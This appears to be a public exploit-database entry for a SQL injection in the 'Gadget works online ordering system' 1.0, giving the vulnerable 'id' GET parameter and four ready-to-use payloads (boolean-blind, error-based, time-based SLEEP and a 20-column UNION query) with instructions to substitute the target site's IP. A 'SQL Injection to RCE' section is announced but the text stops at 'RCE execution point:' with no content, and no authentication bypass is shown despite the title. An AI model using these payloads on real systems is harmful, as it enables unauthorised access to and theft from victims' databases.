# Exploit Title: Gadget works online ordering system - Authentication Bypass SQLi  
# Date: 03/05/2021  
# Exploit Author: Richard Jones  
# Vendor Homepage:  
# Version: 1.0  
# Tested on: Windows 10 build 19041 + xampp 3.2.4  
SQL Injection details:   
*replace IP with the website IP  
Parameter: id (GET)  
Type: boolean-based blind  
Title: Boolean-based blind - Parameter replace (original value)  
Payload: q=single-item&id=(SELECT (CASE WHEN (5628=5628) THEN 1 ELSE (SELECT 9686 UNION SELECT 8857) END))  
Type: error-based  
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
Payload: q=single-item&id=1 OR (SELECT 3320 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(3320=3320,1))),0x716a706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: q=single-item&id=1 AND (SELECT 2585 FROM (SELECT(SLEEP(5)))BrmF)  
Type: UNION query  
Title: Generic UNION query (NULL) - 20 columns  
Payload: q=single-item&id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71787a7671,0x67664845794943545a51517775675672466965636572474d435a48727a58646750687253474d766d,0x716a706271),NULL-- -  
SQL Injection to RCE  
*replace IP with websites IP  
RCE execution point: